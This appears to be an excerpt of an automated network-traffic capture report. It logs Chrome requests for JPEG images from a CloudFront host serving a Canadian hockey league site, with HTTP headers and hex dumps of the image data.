                                                                                                                          X-Amz-Cf-Id: Ye-Nqy9tbzMQX5wKuqZydSdOktuGhafxzAAPAv8WNl7lvxwFFFRMZg==
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 00 08 09 0a ff c4 00 68 10 00 01 02 04 04 03 05 04 07 03 06 09 05 0a 09 0d 01 02 03 00 04 05 11 06 12 21 31 07 41 51 08 13 22 61 71 14 32 81 91 09 15
                                                                                                                          Data Ascii: JFIF&&CC"h!1AQ"aq2
                                                                                                                          2025-01-13 21:01:21 UTC13419INData Raw: bf 51 9c 7d 00 38 4d d4 a5 15 0b 0f 4b db 48 b7 53 ce c3 49 1f 40 08 29 39 0f 38 a3 71 52 95 f5 de 0b a9 ca a1 17 75 84 7b 43 7d 73 36 6e 7f 2b 8f 8c 5c 29 8a 98 76 99 2c 27 5c 4a e6 43 48 ef 4a 45 86 7b 0b fe 70 da a2 c2 5c 77 b9 71 20 a1 d4 90 a0 76 20 e8 62 ec e3 71 1e 35 b8 e9 1c 14 01 17 10 ea b1 26 69 f5 69 d9 10 9b 09 69 87 19 fe ea 88 fd d0 cc e9 1d 04 f2 8a 8d cb 80 3a d3 ea 6a b0 17 75 3f a4 6b 00 f8 a3 27 e0 01 02 97 51 04 7f 8e 4f e9 1a b8 b6 63 68 e6 d6 f5 d9 64 78 31 ee d0 6b 22 8e a0 2f ee a4 df e3 1e 6a 71 e7 16 9c aa 51 d2 3d 2b da 12 df 53 2c 5f ee a7 f5 8f 36 36 1b 5f 84 a8 03 e7 b4 46 28 39 2d 78 58 9f 64 40 3d 62 d2 83 e5 15 bc 30 d9 ee 02 12 92 48 3c b5 8b 32 58 7c 22 fd cb 96 1c f2 98 e4 56 c2 9b 3d ad 94 5b a1 0c 2e e3 89 d3 48 2a
                                                                                                                          Data Ascii: Q}8MKHSI@)98qRu{C}s6n+\)v,'\JCHJE{p\wq v bq5&iii:ju?k'QOchdx1k"/jqQ=+S,_66_F(9-xXd@=b0H<2X|"V=[.H*
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 4c c5 67 00 54 1b 4a 54 cc ce 13 96 2d aa d7 04 5c 9d 3e 62 32 8e 0d 30 b9 8e 2c e0 e6 59 68 15 2a b7 27 60 13 fe 75 26 1f 70 9b dc b9 76 b2 3f f7 7c c5 5f e9 18 ff 00 70 88 b3 76 83 d3 b3 bf 05 8f 4a 7c c7 fb 2d 45 4f b5 54 cb 73 3c 7b c5 a5 a5 5c 22 61 a6 cd bf 12 59 40 3f 9c 5b 3b 42 e9 d9 df 82 e0 8d 7e af 98 36 fe cb 50 89 06 e1 1a d0 be c9 3c 57 39 b3 01 3d 29 7b 6a 7d e6 a2 3f b2 e5 06 89 89 b8 c3 48 a4 e2 0a 5c bc fc 92 e5 e6 5c 32 f3 08 0b 42 94 96 89 17 49 d0 da 26 b8 36 cf 77 d9 3f 8a 24 a4 0c f3 b2 a6 d6 f3 6a 18 76 44 21 7c 7d a3 80 af 72 4e 70 db fe a8 c4 64 f7 c0 22 3b b4 67 0c a6 38 2d 8e 5b a9 61 a5 b8 d5 1e a4 ef b7 d1 e6 9a 57 f4 2a 0a 04 b6 14 39 a0 da de 44 45 e3 1b 49 c9 f6 8d e1 9d 1f 8c f4 26 1b fe 57 61 67 19 93 c4 92 ad 0f 13 cd
                                                                                                                          Data Ascii: LgTJT-\>b20,Yh*'`u&pv?|_pvJ|-EOTs<{\"aY@?[;B~6P<W9=){j}?H\\2BI&6w?$jvD!|}rNpd";g8-[aW*9DEI&Wag
                                                                                                                          2025-01-13 21:01:21 UTC13816INData Raw: 14 78 b5 cf 7f 7b cf 5f ca 31 b5 b3 7b 98 4d 2d 9d a1 2b 0b 7f 01 4f ca 6e a6 9f 2b e5 cf bc f4 1e 00 e3 1d 6b 17 57 d1 47 ee aa 0f d5 67 e6 14 12 fb 64 78 9a 37 24 b8 a2 ab 8b 0d ce b1 b9 31 86 ea 32 ca 0b 97 9d 43 4b 02 d9 90 a5 24 8e ba 88 c0 3b 2b 61 77 66 f1 4c f6 27 71 b3 ec f4 d9 62 cb 6a e4 5e 73 97 c1 20 fc c4 7a 92 34 c3 a3 da cd 6a 92 e7 da 71 6e bc be eb 36 d3 ec 69 54 58 4b be 29 95 c7 30 dd 45 e4 a1 b7 6a 21 68 6c 59 01 4a 51 09 17 e4 0e d0 2b c3 53 cf 38 1d 98 a9 77 8b 16 01 4b cc a3 61 b6 a4 c5 8b e3 1d 13 5d 16 cd 6e e3 f5 66 47 ff 00 11 3a fb 58 55 52 ff 00 a2 3f a1 e6 ec 75 c6 d3 86 31 45 5a 87 33 47 99 9d 7a 42 60 b2 a7 d5 35 62 bb 01 ae a0 9b 45 7a 87 da 46 a2 cc b9 40 a6 cd 36 e0 59 2b 2c cf 29 bb 8b 9c a0 d8 6b a1 b4 54 78 dc 03 7c
                                                                                                                          Data Ascii: x{_1{M-+On+kWGgdx7$12CK$;+awfL'qbj^s z4jqn6iTXK)0Ej!hlYJQ+S8wKa]nfG:XUR?u1EZ3GzB`5bEzF@6Y+,)kTx|
                                                                                                                          2025-01-13 21:01:21 UTC2554INData Raw: ff 00 39 29 2d cb 85 6a 7b b4 5f 5b 9e 44 93 a7 94 7a 1b 6e ab 5e ee 3d 9d 5d da ef e3 fc c9 e1 ba d7 45 b3 e9 d0 75 e8 ed dd 86 f3 bb c6 31 ee dc d3 e9 52 88 a7 cb b7 26 a7 0b 9d da 02 4b 8a 00 12 7a d8 43 f2 94 28 6f 78 45 4d 5d 79 c9 f9 42 80 58 59 31 79 e4 39 07 22 6f fb e2 36 a0 b7 03 e9 49 b6 50 34 23 9c 48 d8 a7 48 83 5c fa a7 1c 52 4b 1d dd 9c 52 50 6f 7b a4 1b 66 3e b6 bf a5 a1 c7 91 82 bb 5e f6 82 13 98 7b b0 a1 65 ab 5f 29 3e b0 83 8e 36 c2 14 e3 8a 4b 68 48 b9 52 8d 80 8b b2 84 76 53 7b 92 04 21 34 92 b4 5a 21 64 31 40 a8 62 29 8a 6a 26 64 0c ab 6d 25 4c 94 bb 77 1c 51 df c8 01 d3 7d a2 3b 88 58 f6 9f 83 e9 6a ca b4 3b 50 7d 24 4b 33 71 be d9 95 d1 20 c4 94 5c 9e 10 06 af 20 f7 0b 09 04 9b 68 21 d6 20 79 78 2f 82 75 27 c9 0d 4c 19 17 41 cc 6c
                                                                                                                          Data Ascii: 9)-j{_[Dzn^=]Eu1R&KzC(oxEM]yBXY1y9"o6IP4#HH\RKRPo{f>^{e_)>6KhHRvS{!4Z!d1@b)j&dm%LwQ};Xj;P}$K3q \ h! yx/u'LAl
                                                                                                                          2025-01-13 21:01:21 UTC3167INData Raw: 69 72 7d 20 1b 95 ef 02 d6 b2 7b a6 47 78 bf 9f eb 17 5a de 54 95 48 c3 19 cf cc af a8 f4 1b 78 53 95 58 bd 38 f9 1b 9d 46 b7 86 66 aa a8 99 4d 5a 4e f2 aa 5a 42 c8 b9 b8 47 86 ea 02 c7 53 7d 0c 55 e4 d5 87 ea 15 99 16 9e 68 3e f4 f4 c6 42 a7 15 98 a8 29 60 65 49 be b7 23 7b 0d e2 8c eb 74 54 d3 98 92 92 69 c9 89 d9 87 03 8f bc 5d 29 61 82 a3 a2 07 23 6b ea a8 d1 f8 41 85 e9 4b e2 1c bd 23 d9 7d a1 74 f2 89 ff 00 6a 52 f3 94 ad b0 6e 81 6d 00 25 48 d3 5f 58 f4 33 a7 5a 92 7b e3 1f 3f c8 f1 e9 db b5 de df c3 1f 99 e9 5a 55 1e 42 89 20 d4 8d 2a 4d a9 56 1a 1a 36 d2 42 45 ce e7 d4 c2 d2 d3 08 c8 94 13 e2 37 85 c9 19 4d cc 36 94 41 28 4a 85 ad 73 fa c7 2d e5 bc 90 33 7e 2a 61 0c 23 8b 27 d3 2d 52 a4 b0 e4 db 2d 85 ad f6 bc 0f 58 9d 01 50 d4 e8 39 de 31 da df
                                                                                                                          Data Ascii: ir} {GxZTHxSX8FfMZNZBGS}Uh>B)`eI#{tTi])a#kAK#}tjRnm%H_X3Z{?ZUB *MV6BE7M6A(Js-3~*a#'-R-XP91


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          130192.168.11.204995954.239.153.1384431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC648OUTGET /app/uploads/gthl/2024/07/17140151/IMG_1192-730x541.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          sec-ch-ua: "Chromium";v="128", "Not;A=Brand";v="24", "Google Chrome";v="128"
                                                                                                                          sec-ch-ua-mobile: ?0
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          sec-ch-ua-platform: "Windows"
                                                                                                                          Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                          Sec-Fetch-Site: cross-site
                                                                                                                          Sec-Fetch-Mode: no-cors
                                                                                                                          Sec-Fetch-Dest: image
                                                                                                                          Referer: https://gthlcanada.com/
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC488INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 120264
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Wed, 17 Jul 2024 18:01:53 GMT
                                                                                                                          ETag: "222850dd1dced31817c2e8b8e25c79da"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 ead5a4c5fbab9ab09302c9bd4c52b4b4.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: Elnorix83LPInn2RM0FwT_AMuQW0k-IgIB1CDs639d6BGea8fRdztw==
                                                                                                                          2025-01-13 21:01:21 UTC15896INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 48 00 48 00 00 ff e1 23 ef 45 78 69 66 00 00 4d 4d 00 2a 00 00 00 08 00 0a 01 0f 00 02 00 00 00 06 00 00 00 86 01 10 00 02 00 00 00 12 00 00 00 8c 01 12 00 03 00 00 00 01 00 01 00 00 01 1a 00 05 00 00 00 01 00 00 00 9e 01 1b 00 05 00 00 00 01 00 00 00 a6 01 28 00 03 00 00 00 01 00 02 00 00 01 31 00 02 00 00 00 21 00 00 00 ae 01 32 00 02 00 00 00 14 00 00 00 cf 87 69 00 04 00 00 00 01 00 00 00 e4 88 25 00 04 00 00 00 01 00 00 02 14 00 00 03 4c 41 70 70 6c 65 00 69 50 68 6f 6e 65 20 31 34 20 50 72 6f 20 4d 61 78 00 00 00 00 48 00 00 00 01 00 00 00 48 00 00 00 01 41 64 6f 62 65 20 50 68 6f 74 6f 73 68 6f 70 20 32 34 2e 30 20 28 4d 61 63 69 6e 74 6f 73 68 29 00 32 30 32 34 3a 30 37 3a 31 37 20 31 34 3a 30 31 3a 31
                                                                                                                          Data Ascii: JFIFHH#ExifMM*(1!2i%LAppleiPhone 14 Pro MaxHHAdobe Photoshop 24.0 (Macintosh)2024:07:17 14:01:1
                                                                                                                          2025-01-13 21:01:21 UTC1082INData Raw: ec 7e 39 a2 83 80 dd 99 c6 fb 7c 28 a0 3b 97 6c 03 9a 28 61 8a e3 73 92 28 00 36 ce db d0 00 ef e0 3c 68 00 40 38 ea 68 03 b1 f0 c5 00 03 01 e2 31 9a 00 29 c7 4c d0 3a 00 af fa 14 84 70 4d bc 68 00 0a 9f 43 40 1d e4 4e d4 00 38 1b d2 03 b7 f9 50 00 f2 f9 d0 00 88 87 ca 80 07 ba 37 c0 a0 02 f3 e4 e0 0e b4 01 dc a5 e4 58 f9 91 4b 6d cc ed 85 1f 13 4c 09 8b 4e 0d f7 90 1e 5d 7b 4f 89 4f dd 88 73 9f a9 60 3f 0a 74 80 73 37 06 e8 d0 2e 65 e2 79 50 8f 23 0f e5 ca 68 a4 04 2e a7 63 a7 59 23 8b 1d 62 7b d9 b6 e5 0f 02 84 f9 b0 03 f0 a4 e8 56 33 0e bd 09 5e be 15 23 0a c5 5b a0 34 00 01 4f 4d 8e fe 34 0e c0 ff 00 5b 50 20 a2 22 73 40 ec 11 07 43 91 40 ac 30 88 0e a3 3f 0a 00 ee cd 47 86 d4 0e c3 85 07 fe d4 05 87 55 c6 f8 eb 4e 84 77 2e fb 8a 00 10 bb 50 04 11 32
                                                                                                                          Data Ascii: ~9|(;l(as(6<h@8h1)L:pMhC@N8P7XKmLN]{OOs`?ts7.eyP#h.cY#b{V3^#[4OM4[P "s@C@0?GUNw.P2
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: e2 da 18 5e 79 c5 20 f8 0c d3 dc 2a 07 df a3 03 7e 71 f1 53 4f 72 0a 0c 2f a1 3b f6 80 1f 53 46 e4 14 2a 2e 90 ee 25 43 f3 a3 72 0a 0c 27 04 75 07 e7 4f 70 83 09 86 31 9a 2c 00 33 01 be ff 00 5a 76 07 73 ab 75 3d 68 03 8b 8f 02 0d 20 00 b8 d8 fe 54 c0 02 dc dd 16 80 04 22 e7 24 62 80 07 94 2e e0 e6 80 07 b2 07 c4 50 07 76 04 12 73 8a 28 0e 2a 71 be 4e 68 00 0a 31 3b 03 f4 a0 02 98 8f 91 26 80 00 44 73 9c 75 a0 0e 11 31 3b 67 af 9d 00 18 42 c0 64 b6 33 e7 40 07 59 02 8d a8 03 95 c3 36 e0 10 0d 00 12 42 0e 70 83 3e 94 80 4c e3 23 3b 53 1d 85 67 50 7c 7e 54 05 9c 26 8c 0f b0 df 5a 54 16 07 6c 9e a0 78 ed 40 1c 24 88 f9 8c f8 9a 00 10 d1 13 b4 80 1a 00 37 30 e8 19 4f c4 d3 03 8b 0c 1c 90 7e 14 00 03 d1 4e f4 01 dc b9 f3 a4 00 94 cf 40 47 c6 8a 00 79 1b a6 7a
                                                                                                                          Data Ascii: ^y *~qSOr/;SF*.%Cr'uOp1,3Zvsu=h T"$b.Pvs(*qNh1;&Dsu1;gBd3@Y6Bp>L#;SgP|~T&ZTlx@$70O~N@Gyz
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 62 ce cc 79 65 d1 5b 6e 18 e1 d9 81 94 06 9e 35 38 69 62 90 aa e7 e5 b9 1e b9 a8 8e 86 0d fb 91 d4 b2 ca bb 24 6c ee 2c 74 b6 5b 6b 58 d6 08 d3 75 0b b7 37 c7 3d 4f c6 bd 08 e1 8c 23 b6 28 97 26 f9 64 ac 3a c2 b2 f3 1e 4e 99 eb 8c ed e1 50 f1 0e c8 9d 43 5b 78 dc 8e 9b 6f e1 8a da 38 d0 59 e7 1f e9 0f c7 7a bc fa b4 3a 05 bd e4 ab 61 1c 2b 2c 90 86 23 b4 63 9c 13 e7 8c 6d 53 28 ad c2 b3 16 8d f9 9b 9c 31 60 6a d2 a3 36 4d f0 06 a2 da 6f 1d e8 d7 45 b9 47 bc 08 cf c1 81 5f d6 96 55 71 12 36 ce 2d b6 7d 0a f2 3d 56 d8 13 63 72 d8 60 07 f5 4e 7c 3e 06 bc 5d 46 2d ae d7 47 a9 a4 cf b9 6d 7d 9d a7 ea 50 df c5 b1 00 f8 a9 eb 5c 53 89 e9 63 9d 0f 52 1b 61 92 72 4f 80 c5 73 33 a7 d4 60 c9 7b 1d ad b9 ec c7 2f 5d db ad 38 99 ca 4d 94 ef 67 da bd c6 a9 c4 17 ba b9
                                                                                                                          Data Ascii: bye[n58ib$l,t[kXu7=O#(&d:NPC[xo8Yz:a+,#cmS(1`j6MoEG_Uq6-}=Vcr`N|>]F-Gm}P\ScRarOs3`{/]8Mg
                                                                                                                          2025-01-13 21:01:21 UTC3778INData Raw: ed cf 40 8b 81 f5 35 4a 0c 97 91 78 09 23 5c df c5 9b 92 22 46 ff 00 85 19 db e6 7c 68 e8 6a d9 79 f6 79 34 1a 75 ab da c4 39 3b 56 e6 73 9e a7 a0 ac e7 6c a8 aa 34 1b 59 fb 34 e6 ce e4 75 3e 15 34 51 5d e0 eb 83 3c 7a bc e4 ef 36 a5 29 eb e0 30 2a 9f 5c 32 55 76 d5 96 dd 22 01 73 ab db ac 8d b2 1e 76 ce d8 51 bd 66 95 3a 09 3f 23 ed 56 c5 35 79 1e e8 86 55 0c 55 0e c0 15 db 23 d4 7c 3c 71 55 19 73 43 ab 22 f5 de 23 d3 e4 b6 8f 46 82 0f da 0b 78 fe e6 b1 2a 73 09 5b 1b a9 3f 65 70 37 39 39 15 a4 53 4e c8 6b 8a 3c dd c4 36 52 68 57 d3 ac 05 d1 22 95 90 02 d9 c6 09 1d 7c 7e 35 ec 41 dc 79 38 1f 0e 88 09 10 ea 72 73 24 6d db 75 3c a3 3c df 1a ce 50 b7 68 ab 1e e9 9b 01 9e b5 d5 16 61 2e c9 eb 7e 83 a5 29 15 11 66 c6 2b 26 58 86 42 4e ad be 1c 63 e9 fe 8d 20
                                                                                                                          Data Ascii: @5Jx#\"F|hjyy4u9;Vsl4Y4u>4Q]<z6)0*\2Uv"svQf:?#V5yUU#|<qUsC"#Fx*s[?ep799SNk<6RhW"|~5Ay8rs$mu<<Pha.~)f+&XBNc
                                                                                                                          2025-01-13 21:01:21 UTC9000INData Raw: c2 12 92 02 14 62 b4 4d c5 f2 8c 5a dd d3 1d 62 18 ad d6 49 19 54 22 96 76 f2 03 ad 61 29 3b 67 5c 31 c6 4a 29 76 79 e7 5d d7 93 88 35 8b bb de 70 7b 79 4b 22 f8 84 1b 28 fa 01 55 17 48 f4 62 88 0d 62 c6 ea cb 13 db 13 eb 8a b3 4a 21 e7 68 b5 19 01 74 0a 40 dc e7 c6 98 99 0d a9 e9 f1 2c 64 0c 13 d3 7d b3 40 88 0b cb 36 43 1a a4 9f e1 6e b5 2d 0d 11 d7 dd b2 73 4a 46 0a 8c 0c 1d b3 59 32 ca 7e a7 3f 6b 2e ea 15 87 52 2a 24 c9 64 97 0d a8 ec a6 39 00 93 81 9d aa e1 d0 bc 93 f6 aa e9 17 69 cc d9 73 9e b9 18 a6 cb 41 65 96 45 53 90 0f 37 a6 33 52 55 89 c3 70 d1 c6 bd d3 93 bf 5f 1a 06 8b 36 81 ac bd 9d ca 15 73 85 00 52 68 68 bf 25 f4 77 83 9a 5c 9d 81 23 ae 3c b1 50 52 29 3c 76 84 59 25 dc 59 66 b5 9d 64 c0 a6 4c ba 1d 9b c5 91 63 78 df 2d 2a 87 0b da f6 8f
                                                                                                                          Data Ascii: bMZbIT"va);g\1J)vy]5p{yK"(UHbbJ!ht@,d}@6Cn-sJFY2~?k.R*$d9isAeES73RUp_6sRhh%w\#<PR)<vY%YfdLcx-*
                                                                                                                          2025-01-13 21:01:21 UTC8408INData Raw: 4a 2c 28 01 cc 0f 3a c6 49 f8 51 61 41 92 49 1c e1 82 a1 e9 ca 46 33 49 c8 69 02 4a e7 78 cf d6 8b 0a 1d 16 80 1f b3 18 f9 57 d0 51 f3 81 7b 58 87 90 f8 01 4e 86 19 67 4f 33 43 42 0e b3 a9 1f 78 8f 8d 2a 0a 15 e7 59 23 78 bc 1d 0a fd 46 2b 1c b1 b8 b2 f1 f1 34 64 85 4a 7f 85 81 af 08 fa 3f 03 db 85 f1 14 84 3f 41 95 07 ce 90 c4 6e 57 f7 47 1e 64 55 44 99 0d a5 1f bf 6f ed 28 3f 85 58 8b 7f 0b 31 6d 1d 97 20 72 c9 fa 0a f5 74 53 f6 72 78 fa d8 7f 12 c7 c4 37 37 51 5d 6f 29 cc b1 80 53 1d 4e 3e 55 9b ce 97 93 45 85 bf 02 6c f1 2f 59 54 7c c5 43 d4 c7 e4 b5 a7 97 c0 99 ba b6 51 bc c3 e4 6b 37 ab 8f c9 6b 4d 2f 81 26 d4 6c 93 ac 99 fa d6 6f 59 12 d6 92 41 0e b5 64 be 67 fd 7c 6a 1e b5 78 45 ad 1b 08 78 8a d5 7a 27 d4 d4 3d 6b f0 8d 16 8d 1c 9c 4f 13 38 54 45
                                                                                                                          Data Ascii: J,(:IQaAIF3IiJxWQ{XNgO3CBx*Y#xF+4dJ??AnWGdUDo(?X1m rtSrx77Q]o)SN>UEl/YT|CQk7kM/&loYAdg|jxExz'=kO8TE
                                                                                                                          2025-01-13 21:01:21 UTC16384INData Raw: 2e 74 ce ad 3c dc e9 95 3e 20 bb 4b ae 20 b3 45 91 cd a4 92 18 82 16 38 70 10 e5 88 cf 9e f5 bc 31 c1 45 d2 3b 75 31 51 8a 2f 5c 07 65 3e 8d ec fa c8 5e cf 2c 93 de 73 de 15 3f 75 5c e5 47 d3 1f 5a ac f4 e5 c1 7a 18 b8 c3 92 a6 2f fd ef 5f 9a dd 63 12 47 07 7a 52 72 77 eb cb b7 a5 25 1a 56 6e e5 72 1d de 5e 8b 97 0a a1 57 99 b2 b1 8e 80 54 95 29 36 4b ae bf 7a f6 57 36 42 4e da 19 91 62 70 fb ee 48 00 8f 2c 51 1e 1d 1c 7a ba f4 dd f6 6c 37 30 b9 77 cc a8 b8 f0 cd 7a 2f f6 7c fa 1b 76 7c e3 ab 1c f5 c2 93 4a e2 3e 42 ba 95 c0 01 b6 e9 b6 28 e0 04 48 65 6c 80 fc a3 a8 19 15 2f a1 a0 dd a0 0d ca 01 0a 3a 64 54 d3 1d 87 17 67 1b 18 b1 f1 ab e0 9e 4c 96 48 02 9e e3 01 8f 5a ed 38 c4 fb 1c 36 e0 91 8f 0a 00 e3 14 b9 ca a6 05 4d 0d 00 f6 b2 03 f6 89 27 c6 8a 00
                                                                                                                          Data Ascii: .t<> K E8p1E;u1Q/\e>^,s?u\GZz/_cGzRrw%Vnr^WT)6KzW6BNbpH,Qzl70wz/|v|J>B(Hel/:dTgLHZ86M'
                                                                                                                          2025-01-13 21:01:22 UTC15990INData Raw: cd 8f eb 59 86 3a f4 ee ab ef 5e 5f d4 f7 47 4f ed f9 36 5e f7 b4 d1 f5 1f 6a f0 25 d4 76 36 b7 16 e9 3c ae 23 48 e2 cc 8e 58 9d 87 95 7c fe 0d 0e a3 33 f6 a2 9e 1c 50 57 37 61 97 4c d5 75 f9 5e 5d 7a ee 46 b0 8c 06 c0 97 3c 98 f0 00 6c 09 f1 63 be 36 03 c4 fd 87 d3 f4 11 d3 e3 e7 bf 2c f2 75 19 d4 a5 ec 54 58 38 7b 48 b3 bf 86 3b c9 90 25 b5 b8 74 58 99 07 20 5f 0e 53 d7 e6 77 3e 15 e8 5a f8 39 d3 92 e9 91 f7 9a 3d 8d cd e3 01 67 08 8e 58 f9 22 93 de 3b 11 cd de 25 b0 0e db e3 af 4c 57 3e d8 cb c1 d0 b3 64 8a ec 4f 4d b4 b0 d1 35 38 85 b6 9d 6e 8f 00 ec ae 27 8d 8f 34 d9 dc 37 3b 11 d3 ae 4d 67 27 ce d4 84 dc a4 ad b1 c7 13 d9 5b 6b f6 42 f8 28 92 28 10 3a 3a a2 e3 9d 4e 7f 78 bd 08 c0 df f0 c8 a1 37 1e 50 97 c3 28 da cf b3 6d 17 5b 47 bc d3 e0 86 39 18
                                                                                                                          Data Ascii: Y:^_GO6^j%v6<#HX|3PW7aLu^]zF<lc6,uTX8{H;%tX _Sw>Z9=gX";%LW>dOM58n'47;Mg'[kB((::Nx7P(m[G9
                                                                                                                          2025-01-13 21:01:22 UTC2442INData Raw: e5 75 c1 20 64 1c 6d 40 10 da cd 9d b9 46 92 2c 23 37 dd 23 00 d4 81 5e b8 8c 05 48 8a b0 39 1b 50 01 e6 55 c6 09 3f 95 00 46 4a ab 21 6e f1 19 38 18 a0 42 73 5b 46 37 0c d8 03 ce 8a 11 1e e1 40 db 35 24 85 c9 34 00 5a 40 0f 85 30 1d 69 56 32 6a 7a 9d ad 94 3f d6 4f 2a c6 be 84 9c 66 a3 24 d4 22 e4 fa 45 e3 83 9c 94 57 93 60 b8 58 34 f4 11 4c b3 39 46 68 cb 06 03 38 db a6 2b e7 70 61 86 56 d9 ed e6 cb 2c 54 83 44 d6 4d 0a 48 f2 da ac 4e dd e4 6e 72 e8 37 dc b0 1f 96 de 95 d7 0c 10 4b 6d 1c af 51 36 f7 59 19 05 d4 37 97 0f 04 56 f8 c4 65 81 69 0b 78 81 b6 c3 ce 96 5d 3c 31 e3 72 48 db 0e a2 53 9a 8b 3a e6 58 ed 99 23 96 d6 26 62 81 81 0c c3 3b 91 be 0f a7 a5 2d 36 38 64 82 93 44 6a 35 13 c7 3d a8 5a 6b 2d 4a 10 63 7b 58 92 3c ff 00 55 95 e5 53 82 73 d7 3d
                                                                                                                          Data Ascii: u dm@F,#7#^H9PU?FJ!n8Bs[F7@5$4Z@0iV2jz?O*f$"EW`X4L9Fh8+paV,TDMHNnr7KmQ6Y7Veix]<1rHS:X#&b;-68dDj5=Zk-Jc{X<USs=


                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                          131192.168.11.204996054.239.153.764431400C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                          2025-01-13 21:01:21 UTC437OUTGET /app/uploads/gthl/2024/12/02164945/AROUND-THE-G-TITLE-November-2024-730x411.jpg HTTP/1.1
                                                                                                                          Host: d2pr6pnwfmh0za.cloudfront.net
                                                                                                                          Connection: keep-alive
                                                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36
                                                                                                                          Accept: */*
                                                                                                                          Sec-Fetch-Site: none
                                                                                                                          Sec-Fetch-Mode: cors
                                                                                                                          Sec-Fetch-Dest: empty
                                                                                                                          Accept-Encoding: gzip, deflate, br, zstd
                                                                                                                          Accept-Language: en-US,en;q=0.9
                                                                                                                          2025-01-13 21:01:21 UTC487INHTTP/1.1 200 OK
                                                                                                                          Content-Type: image/jpeg
                                                                                                                          Content-Length: 71079
                                                                                                                          Connection: close
                                                                                                                          Date: Mon, 13 Jan 2025 21:01:22 GMT
                                                                                                                          Last-Modified: Mon, 02 Dec 2024 17:00:33 GMT
                                                                                                                          ETag: "4b609d04ebe6ce1bebb6d4708144d110"
                                                                                                                          x-amz-server-side-encryption: AES256
                                                                                                                          Accept-Ranges: bytes
                                                                                                                          Server: AmazonS3
                                                                                                                          X-Cache: Miss from cloudfront
                                                                                                                          Via: 1.1 e0ed595b39732d9e9972db26854384ec.cloudfront.net (CloudFront)
                                                                                                                          X-Amz-Cf-Pop: IAD50-C2
                                                                                                                          X-Amz-Cf-Id: rHIW8c9F1tt4errNsFgxVjKToZNLEs257VAzvcMZiChb0a-7pTnuIg==
                                                                                                                          2025-01-13 21:01:21 UTC8192INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 02 00 26 00 26 00 00 ff db 00 43 00 03 02 02 02 02 02 03 02 02 02 03 03 03 03 04 06 04 04 04 04 04 08 06 06 05 06 09 08 0a 0a 09 08 09 09 0a 0c 0f 0c 0a 0b 0e 0b 09 09 0d 11 0d 0e 0f 10 10 11 10 0a 0c 12 13 12 10 13 0f 10 10 10 ff db 00 43 01 03 03 03 04 03 04 08 04 04 08 10 0b 09 0b 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 10 ff c0 00 11 08 01 9b 02 da 03 01 22 00 02 11 01 03 11 01 ff c4 00 1e 00 00 00 07 01 01 01 01 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 00 09 0a ff c4 00 60 10 00 01 03 03 02 04 04 03 04 06 06 05 04 0c 0b 09 01 02 03 04 00 05 11 06 21 07 12 31 41 08 13 51 61 14 22 71 09 32 81 91 15
                                                                                                                          Data Ascii: JFIF&&CC"`!1AQa"q2
